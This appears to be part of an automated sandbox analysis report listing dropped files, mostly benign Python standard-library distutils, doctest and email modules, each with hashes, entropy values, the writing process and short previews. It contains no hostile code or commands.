                                                                                                                                                                                                            Preview:"""Tests for distutils.sysconfig."""..import contextlib..import os..import shutil..import subprocess..import sys..import textwrap..import unittest....from distutils import sysconfig..from distutils.ccompiler import get_default_compiler..from distutils.tests import support..from test.support import run_unittest, swap_item..from test.support.os_helper import TESTFN..from test.support.warnings_helper import check_warnings......class SysconfigTestCase(support.EnvironGuard, unittest.TestCase):.. def setUp(self):.. super(SysconfigTestCase, self).setUp().. self.makefile = None.... def tearDown(self):.. if self.makefile is not None:.. os.unlink(self.makefile).. self.cleanup_testfn().. super(SysconfigTestCase, self).tearDown().... def cleanup_testfn(self):.. if os.path.isfile(TESTFN):.. os.remove(TESTFN).. elif os.path.isdir(TESTFN):.. shutil.rmtree(TESTFN).... def test_get_config_h_filename(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3543
                                                                                                                                                                                                            Entropy (8bit):4.295388944579825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HfSrGVptl0+lroCjELicJbrbp/blQz5WZ:YGkWoCabcWZ
                                                                                                                                                                                                            MD5:558273EF27021D8699D81DB87BD781E6
                                                                                                                                                                                                            SHA1:EE22F1AEE5A9BF99CB0453226A29AEAECF5FDAC4
                                                                                                                                                                                                            SHA-256:D608F65DA39F39B96C78690AB80043E4B743DC19D73BD0FA7DFD6A0FA6472F03
                                                                                                                                                                                                            SHA-512:F664901C3F0FE52177CBE98FC7DB2CBD2B44DA79071FB079DDD8602A9B6FFA4A7730A2F1CCA67FCD8E4C258F0B13DC5D10938521F319F98759E0E593399F2AEA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.text_file."""..import os..import unittest..from distutils.text_file import TextFile..from distutils.tests import support..from test.support import run_unittest....TEST_DATA = """# test file....line 3 \\..# intervening comment.. continues on next line.."""....class TextFileTestCase(support.TempdirManager, unittest.TestCase):.... def test_class(self):.. # old tests moved from text_file.__main__.. # so they are really called by the buildbots.... # result 1: no fancy options.. result1 = ['# test file\n', '\n', 'line 3 \\\n',.. '# intervening comment\n',.. ' continues on next line\n'].... # result 2: just strip comments.. result2 = ["\n",.. "line 3 \\\n",.. " continues on next line\n"].... # result 3: just strip blank lines.. result3 = ["# test file\n",.. "line 3 \\\n",.. "# intervening comment\n",..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4974
                                                                                                                                                                                                            Entropy (8bit):4.65272738839175
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Pm1rArx/8WVxYMAsgODc8gl9IC660I4CqWkqgrjl9Akt/jV9Att75pZ:OVqRUnrBQIpqPqUl9pJV9sjpZ
                                                                                                                                                                                                            MD5:18B6C584615E913142AAEDBBEC1BBC83
                                                                                                                                                                                                            SHA1:F9B3A2AAA32BDD932C08E34A8F5DC90B7F179C84
                                                                                                                                                                                                            SHA-256:A0FDDB9FD1B83B54489F28C1C1DB497E9B3DB88A47DD1DD9B560DCF68BDCA8C5
                                                                                                                                                                                                            SHA-512:A9EEAAA0A91AA0324A0251C4A95AD6CF098588C1529120C4D8D62E495297D3D5CA2B33D37092703D452E018AFB20291045E0C2D8889F9F064CBB9FC83BDC6056
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.unixccompiler."""..import sys..import unittest..from test.support import run_unittest..from test.support.os_helper import EnvironmentVarGuard....from distutils import sysconfig..from distutils.unixccompiler import UnixCCompiler....class UnixCCompilerTestCase(unittest.TestCase):.... def setUp(self):.. self._backup_platform = sys.platform.. self._backup_get_config_var = sysconfig.get_config_var.. self._backup_config_vars = dict(sysconfig._config_vars).. class CompilerWrapper(UnixCCompiler):.. def rpath_foo(self):.. return self.runtime_library_dir_option('/foo').. self.cc = CompilerWrapper().... def tearDown(self):.. sys.platform = self._backup_platform.. sysconfig.get_config_var = self._backup_get_config_var.. sysconfig._config_vars.clear().. sysconfig._config_vars.update(self._backup_config_vars).... @unittest.skipIf(sys.platform == 'win32', "can't test on Windows")..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7360
                                                                                                                                                                                                            Entropy (8bit):4.759594962379558
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LorLoDFfFV2x0UKxu77lJuYgRHvd8IFzLpHGjYfDrkh0NvWP5uZ:Oa5XWlJuYu1xTmcbrkOguZ
                                                                                                                                                                                                            MD5:D10C9A8EC04D06891025D32AB878B457
                                                                                                                                                                                                            SHA1:EABB935269684C69E05D5A91A70E19D7CA44BC6A
                                                                                                                                                                                                            SHA-256:8A39C43D654DE996401B54A41CD879051219D07CB0559A4CBBBDE0E4C91F6FA9
                                                                                                                                                                                                            SHA-512:217E326EAB88B033703DA406406E5F67D98556033D59B6BA3FAAA1AC2A8279C66756BFAEFF97B8576269B952A770B40080F1824081D5FEA756AB5D6C5B7B79F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.upload."""..import os..import unittest..import unittest.mock as mock..from urllib.error import HTTPError....from test.support import run_unittest....from distutils.command import upload as upload_mod..from distutils.command.upload import upload..from distutils.core import Distribution..from distutils.errors import DistutilsError..from distutils.log import ERROR, INFO....from distutils.tests.test_config import PYPIRC, BasePyPIRCCommandTestCase....PYPIRC_LONG_PASSWORD = """\..[distutils]....index-servers =.. server1.. server2....[server1]..username:me..password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....[server2]..username:meagain..password: secret..realm:acme..repository:http://another.pypi/.."""......PYPIRC_NOPASSWORD = """\..[distutils]....index-servers =.. server1....[server1]..username:me.."""....class FakeOpen(object):.... def __init__(self, url, msg=None, code=None):.. self.url = url.. if not isin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11921
                                                                                                                                                                                                            Entropy (8bit):4.656866498138441
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:IK2Q/3U5N+Sa/Kv8k6qN9W/sW/WwWEWs0W8dS1vKbKGWpjln2S/G/9rZ:IK2SC+BigqN0POdUKGpxk
                                                                                                                                                                                                            MD5:D6E698AEAEE2DD3C25690355DBF825F4
                                                                                                                                                                                                            SHA1:CC644E7554A9AE78B0987F8262B8EC09F053307A
                                                                                                                                                                                                            SHA-256:F1ED582FB31246CFEE79BD2C56E796396C80595BF82FD43939F456A9C6C15553
                                                                                                                                                                                                            SHA-512:0AB52CAFD78ED3FF3A455194C457DAB29365536E889A8F2E7C26E6702445636D5B4E90EF609C6BD4E88BA613597E62B979CC9D741B291CDA290FFE69E951CDD3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.util."""..import os..import sys..import unittest..from copy import copy..from test.support import run_unittest..from unittest import mock....from distutils.errors import DistutilsPlatformError, DistutilsByteCompileError..from distutils.util import (get_platform, convert_path, change_root,.. check_environ, split_quoted, strtobool,.. rfc822_escape, byte_compile,.. grok_environment_error)..from distutils import util # used to patch _environ_checked..from distutils.sysconfig import get_config_vars..from distutils import sysconfig..from distutils.tests import support..import _osx_support....class UtilTestCase(support.EnvironGuard, unittest.TestCase):.... def setUp(self):.. super(UtilTestCase, self).setUp().. # saving the environment.. self.name = os.name.. self.platform = sys.platform.. self.version = sys.version.. self.sep = os.sep.. se
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3537
                                                                                                                                                                                                            Entropy (8bit):4.07263502285576
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OqM1MorotlcsWSiE/gOELw/D+o6snA9z7B572I:1yZrU1gOEM/D+Knkzt57Z
                                                                                                                                                                                                            MD5:4C02D380EAB776659E3C2BE7744DA058
                                                                                                                                                                                                            SHA1:6175988D34EC32021107B44A5A26049CA1038583
                                                                                                                                                                                                            SHA-256:602724734AD8E4F5FF3592F3E3F7F39941060C21D3F4647ECCCB38DE548C186D
                                                                                                                                                                                                            SHA-512:FA30277D0321DAA3193B5DF3F4D2FE356814AA3F64FC0C0298EFF674697F8653415B416B0982BA9D3FCE0A73F7EC07E61B6514DD2284751E6725EB0ED6E408D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.version."""..import unittest..from distutils.version import LooseVersion..from distutils.version import StrictVersion..from test.support import run_unittest....class VersionTestCase(unittest.TestCase):.... def test_prerelease(self):.. version = StrictVersion('1.2.3a1').. self.assertEqual(version.version, (1, 2, 3)).. self.assertEqual(version.prerelease, ('a', 1)).. self.assertEqual(str(version), '1.2.3a1').... version = StrictVersion('1.2.0').. self.assertEqual(str(version), '1.2').... def test_cmp_strict(self):.. versions = (('1.5.1', '1.5.2b2', -1),.. ('161', '3.10a', ValueError),.. ('8.02', '8.02', 0),.. ('3.4j', '1996.07.12', ValueError),.. ('3.2.pl0', '3.1.1.6', ValueError),.. ('2g6', '11g', ValueError),.. ('0.9', '2.2', -1),.. ('1.2.1', '1.2', 1),.. ('1.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293
                                                                                                                                                                                                            Entropy (8bit):4.439107551739782
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:LbMEnM1Ir4X/TM1RRpXIF8oMJMhAg5RcM16JAjajZ45n7:LblMNTM3RpHm5PcMu2aFy7
                                                                                                                                                                                                            MD5:D93469D3467DFE7F95027BCBB74480A2
                                                                                                                                                                                                            SHA1:D879342674EA0995AE1681EB4A968D97EE3959DE
                                                                                                                                                                                                            SHA-256:EE33CDDF0FBF6B13ADC54A08508E4A7407F35EECEC610566727790E5B8E40D23
                                                                                                                                                                                                            SHA-512:CC35862AC885A3BCDE4F8DA5D52EAF98BEA84F91C803987BDB1DF2C908C92D149851012D9F461F8F9A027206F65E796233D993A9A9CDBB08CB8763866772EF9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests harness for distutils.versionpredicate....."""....import distutils.versionpredicate..import doctest..from test.support import run_unittest....def test_suite():.. return doctest.DocTestSuite(distutils.versionpredicate)....if __name__ == '__main__':.. run_unittest(test_suite())..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12769
                                                                                                                                                                                                            Entropy (8bit):4.139842676813517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:veDMVkiF0UDBPnmva97SO7giGkp/TUWJ2/2OiQ7T4qhSSB:vG0F0+xnmy97SOsipwN+ODT4ASSB
                                                                                                                                                                                                            MD5:5B2D8FE58F1E3A50F4306800CD5D5F73
                                                                                                                                                                                                            SHA1:6297C28FB4BB6CEC6C5BAEE2FCA6A2CAD0F613E5
                                                                                                                                                                                                            SHA-256:6EB413F25DA9A0E0123749386C325A247316B520D6E71F8D70C0E2341B51572A
                                                                                                                                                                                                            SHA-512:D51BFE118CC37B25CA6FA044E363C29F61DF130DE2194F2DB399166D80CCD25F995EE9857D6673CF9E2B18D543381FAD710BD050F3B38DBB9EF83BD12723B04A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""text_file....provides the TextFile class, which gives an interface to text files..that (optionally) takes care of stripping comments, ignoring blank..lines, and joining lines with backslashes."""....import sys, io......class TextFile:.. """Provides a file-like object that takes care of all the things you.. commonly want to do when processing a text file that has some.. line-by-line syntax: strip comments (as long as "#" is your.. comment character), skip blank lines, join adjacent lines by.. escaping the newline (ie. backslash at end of line), strip.. leading and/or trailing whitespace. All of these are optional.. and independently controllable..... Provides a 'warn()' method so you can generate warning messages that.. report physical line number, even if the logical line in question.. spans multiple physical lines. Also provides 'unreadline()' for.. implementing line-at-a-time lookahead..... Constructor is calle
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15147
                                                                                                                                                                                                            Entropy (8bit):4.448470186893356
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:wzAzNVcUdS6SX9UwuoOtc+iqhDjKRWi9NksdPGfGKiHC:wzAzNVXdSxNpuoOtxi86WGVGzii
                                                                                                                                                                                                            MD5:657E466881C481015D6536FAE05E52DC
                                                                                                                                                                                                            SHA1:1A39A789BD214B4DA8A1FB3DFB7929F7155E3AE9
                                                                                                                                                                                                            SHA-256:290C6092E6CED6C747FB7B8495F9F76A91BFCEBDE40EF42CD6EDCEEEBBD0685B
                                                                                                                                                                                                            SHA-512:D4642A53AA9A16D20E5E843C303C1B0E870EA90FB468BF59D60DC5B02653FB49A1F360BA4E2F8D505229D0F5180D207C0663234DEFBB8DD3561A04D6B152BCC2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.unixccompiler....Contains the UnixCCompiler class, a subclass of CCompiler that handles..the "typical" Unix-style command-line C compiler:.. * macros defined with -Dname[=value].. * macros undefined with -Uname.. * include search directories specified with -Idir.. * libraries specified with -lllib.. * library search directories specified with -Ldir.. * compile handled by 'cc' (or similar) executable with -c option:.. compiles .c to .o.. * link static library handled by 'ar' command (possibly with 'ranlib').. * link shared library handled by 'cc -shared'.."""....import os, sys, re....from distutils import sysconfig..from distutils.dep_util import newer..from distutils.ccompiler import \.. CCompiler, gen_preprocess_options, gen_lib_options..from distutils.errors import \.. DistutilsExecError, CompileError, LibError, LinkError..from distutils import log....if sys.platform == 'darwin':.. import _osx_support....# XXX Things not currently handled:..# * op
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21594
                                                                                                                                                                                                            Entropy (8bit):4.615178367240913
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:GRKyrWmOWhZHZUc27lNLBY2egwpvmCF2T9oyQ3T6xv:GRXWmOWhZ5INTegwRP2T9oZD6xv
                                                                                                                                                                                                            MD5:FFE1A4C805B8ABA0E4D67243AADF57E0
                                                                                                                                                                                                            SHA1:E226874B6DDB81EFA0A1B2510BC4163713235D72
                                                                                                                                                                                                            SHA-256:C1529C13D837B9F5416757CBF99C16F5304C4D4B64139CBE162551F8878F34EB
                                                                                                                                                                                                            SHA-512:0486FA8902C7E191EBDE1361D586F656FA26BD1D222412D45DB98B50FCD9AF94B149AF0866983B170BAA33EAADEB455C4DC06B1130E284DB83E34EEE1AED95B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.util....Miscellaneous utility functions -- anything that doesn't fit into..one of the other *util.py modules..."""....import os..import re..import importlib.util..import string..import sys..import distutils..from distutils.errors import DistutilsPlatformError..from distutils.dep_util import newer..from distutils.spawn import spawn..from distutils import log..from distutils.errors import DistutilsByteCompileError....def get_host_platform():.. """Return a string that identifies the current platform. This is used mainly to.. distinguish platform-specific build directories and platform-specific built.. distributions. Typically includes the OS name and version and the.. architecture (as supplied by 'os.uname()'), although the exact information.. included depends on the OS; eg. on Linux, the kernel version isn't.. particularly important..... Examples of returned values:.. linux-i586.. linux-alpha (?).. solaris-2.6-sun4u.... Windows wil
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12861
                                                                                                                                                                                                            Entropy (8bit):4.503090248554634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:FJ/zIVlTJJZjno7SoVfwhZBFJucReV4fe:P/I7TLo7S0fIZBPucIV4fe
                                                                                                                                                                                                            MD5:21486BEBF943B13A3B5600E114742E3C
                                                                                                                                                                                                            SHA1:C9EBFD9E9A702F7266C12CFA3587494AE56F009F
                                                                                                                                                                                                            SHA-256:2480D94C7E49EAE510ED9AB9FDAC611E8489DC019F4C8148B17DE7FF347126DE
                                                                                                                                                                                                            SHA-512:16EC28CAF71A9C1D7C172FAA25A1822018B2BC71099B346F3B95BC129937BFAB73E24820587AED730BEE92391549F25BB802592A56FBD02FEAF76F371BF14CF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# distutils/version.py..#..# Implements multiple version numbering conventions for the..# Python Module Distribution Utilities...#..# $Id$..#...."""Provides classes to represent module version numbers (one class for..each style of version numbering). There are currently two such classes..implemented: StrictVersion and LooseVersion.....Every version number class implements the following interface:.. * the 'parse' method takes a string and parses it to some internal.. representation; if the string is an invalid version number,.. 'parse' raises a ValueError exception.. * the class constructor takes an optional string argument which,.. if supplied, is passed to 'parse'.. * __str__ reconstructs the string that was passed to 'parse' (or.. an equivalent string -- ie. one that will generate an equivalent.. version number instance).. * __repr__ generates Python code to recreate the version number instance.. * _cmp compares the current instance with either another instanc
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5299
                                                                                                                                                                                                            Entropy (8bit):4.7667873848754905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:98uBsb7SQ2EoxR1JQeHILG/R/kX/Ix/aJoGz4dyIdxtjrIpSqPLU:98ysOQ2EoVpUG/R/8/Ix5ndnxtcPLU
                                                                                                                                                                                                            MD5:88B0BBEDEA3A48613632A05A0D9E2847
                                                                                                                                                                                                            SHA1:D6FCDBD4CD6F17C373D33D47B325AC5669067F33
                                                                                                                                                                                                            SHA-256:C7C544D2513B914C3198C469538272B3445F6FE6C118F0185ADED6232522F073
                                                                                                                                                                                                            SHA-512:70C31C1472CEE0EED296B24A959CA6B70E35DFC315239D70CC37D0F5F22EADF1FC07A0FEAD89CFD92C25F9525D6FB132466FA1C77EAE69C7E10DA4DA4335110A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Module for parsing and testing package version predicate strings..."""..import re..import distutils.version..import operator......re_validPackage = re.compile(r"(?i)^\s*([a-z_]\w*(?:\.[a-z_]\w*)*)(.*)",.. re.ASCII)..# (package) (rest)....re_paren = re.compile(r"^\s*\((.*)\)\s*$") # (list) inside of parentheses..re_splitComparison = re.compile(r"^\s*(<=|>=|<|>|!=|==)\s*([^\s,]+)\s*$")..# (comp) (version)......def splitUp(pred):.. """Parse a single version comparison..... Return (comparison string, StrictVersion).. """.. res = re_splitComparison.match(pred).. if not res:.. raise ValueError("bad package restriction syntax: %r" % pred).. comp, verStr = res.groups().. return (comp, distutils.version.StrictVersion(verStr))....compmap = {"<": operator.lt, "<=": operator.le, "==": operator.eq,.. ">": operator.gt, ">=": operator.ge, "!=": operator.ne}....class VersionPredicate:.. """Parse and test package version predicates..... >>> v = VersionP
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):107953
                                                                                                                                                                                                            Entropy (8bit):4.560169703474059
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:kELdb9WiDz1eFhoeYsioJT0T+0GNC9sjQeOEx9VUaHsez20T+28:bdb9WiDz1eFhFYsioJT0T+0GNC9sjQee
                                                                                                                                                                                                            MD5:F568FFB0098065BC1CDFFA226D00C81E
                                                                                                                                                                                                            SHA1:7ACB808E8F5B7B72197A71DE0880C1DFD39F563A
                                                                                                                                                                                                            SHA-256:9DA24E3793F13F188F6150D6DFAF36AC2E20BFD76E70AECFB2136A8FF350D993
                                                                                                                                                                                                            SHA-512:22431867A30D5F33026C764CC6573F8723B72B305FB327B7FDEAB53580ECC999F1D7AC0AC1521111700BB335DBEF708A4363ED744EAF8AA6C5CFF0AF21B62C4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Module doctest...# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org)...# Major enhancements and refactoring by:..# Jim Fulton..# Edward Loper....# Provided as-is; use at your own risk; no warranty; no promises; enjoy!....r"""Module doctest -- a framework for running examples in docstrings.....In simplest use, end each module M to be tested with:....def _test():.. import doctest.. doctest.testmod()....if __name__ == "__main__":.. _test()....Then running the module as a script will cause the examples in the..docstrings to get executed and verified:....python M.py....This won't display anything unless an example fails, in which case the..failing example(s) and the cause(s) of the failure(s) are printed to stdout..(why not stderr? because stderr is a lame hack <0.2 wink>), and the final..line of output is "Test failed.".....Run it with the -v switch instead:....python M.py -v....and a detailed report of all examples tried is printed to stdout, alo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1828
                                                                                                                                                                                                            Entropy (8bit):4.659617027776494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:2XvNh6MGDFchDSvkvxnsj/axPSLxnsbXqxP0:2Xlh6M/DxnsjuPSlnsbXGP0
                                                                                                                                                                                                            MD5:4A5BEB56533BF0D8B94EE640F866E491
                                                                                                                                                                                                            SHA1:44497180DE35656486799BC533DE4EAAF3C3EE2C
                                                                                                                                                                                                            SHA-256:AF3DD99D5C82FA7E75A653B813A592A92CF453EBC4226FB330CD47E560395426
                                                                                                                                                                                                            SHA-512:06D65E564E593489F4D49D8EAB35936B829913DB1898B25AEC2532C42BCBE1A1450248F98972119349DC1FD17337AB48F9B4749075195E763ABDFD8F430A4AF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""A package for parsing, handling, and generating email messages."""....__all__ = [.. 'base64mime',.. 'charset',.. 'encoders',.. 'errors',.. 'feedparser',.. 'generator',.. 'header',.. 'iterators',.. 'message',.. 'message_from_file',.. 'message_from_binary_file',.. 'message_from_string',.. 'message_from_bytes',.. 'mime',.. 'parser',.. 'quoprimime',.. 'utils',.. ].........# Some convenience routines. Don't import Parser and Message as side-effects..# of importing email since those cascadingly import most of the rest of the..# email package...def message_from_string(s, *args, **kws):.. """Parse a string into a Message object model..... Optional _class and strict are passed to the Parser constructor... """.. from email.parser import Parser.. return Parser(*args, **kws).parsestr(s)....def message_from_bytes(s,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1610
                                                                                                                                                                                                            Entropy (8bit):4.931242216621298
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:WwQTrfch6OD9tLNomDT235JNwqv4N8DqNCu:Wprfch6Oloy+wXqWCu
                                                                                                                                                                                                            MD5:4A843E58AA7F0D2DD1133B42688A1D7E
                                                                                                                                                                                                            SHA1:975558513CA2513DF77E02253AD3E74F9A638CC4
                                                                                                                                                                                                            SHA-256:04BB921674EABF5D8415F8D32E5CD6C1ADA891619D618F8A19C8A8FD07D50148
                                                                                                                                                                                                            SHA-512:F49CE04F05A03A43BB2797B0111A28C82480555D1833B65C842B183BB6E5A105CCD38E57266B09F0A988AB52FAE3F5FCF3774DCEECE90D023184521DF026F6C1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytes..mime..parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr......parsestr)...s..args..kwsr......r.....WC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1584
                                                                                                                                                                                                            Entropy (8bit):4.918443694359967
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lvwQTrfch6OD9tLNoe0ThNVAH4N6rqNkh8O:lprfch6OloBLWo6rWk+O
                                                                                                                                                                                                            MD5:AE49C17489D29A1471881D8204F8682D
                                                                                                                                                                                                            SHA1:2E6791539BC0AA71CEB7829713DF18F061D9C8D9
                                                                                                                                                                                                            SHA-256:DBE8DA45641724C8FA7887D7621BACD0405CD3E681C610671893431F9ACE7414
                                                                                                                                                                                                            SHA-512:2CF949E56E82A8D501682626B1AA6759B8EDD862324131B66B99C4FCBD91EA263173A23C31F10DA58565E6042D9C24FEDAE6DAD18CBD9879B946BD292A4D2E3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mimeZ.parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5790
                                                                                                                                                                                                            Entropy (8bit):5.423001576832235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SOU9w0nphN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:E7N0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                            MD5:659E317732C995BC0F0CC95E5572B745
                                                                                                                                                                                                            SHA1:9F2CE0B422AA80F5464C35A3915A334977AF838A
                                                                                                                                                                                                            SHA-256:07DE71B81710A447551B33419CC38A3FE9234EF0CB6AF3161C8DEC0C8B35EDA4
                                                                                                                                                                                                            SHA-512:95EF69F151E6AD0E821341732C54539CB234BAB8BAB56FDAB5B0C20FDD699012269C7E1D397724B7BEEE275F60766294A02DC24B1ABCD532ADA0DD75271C099C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
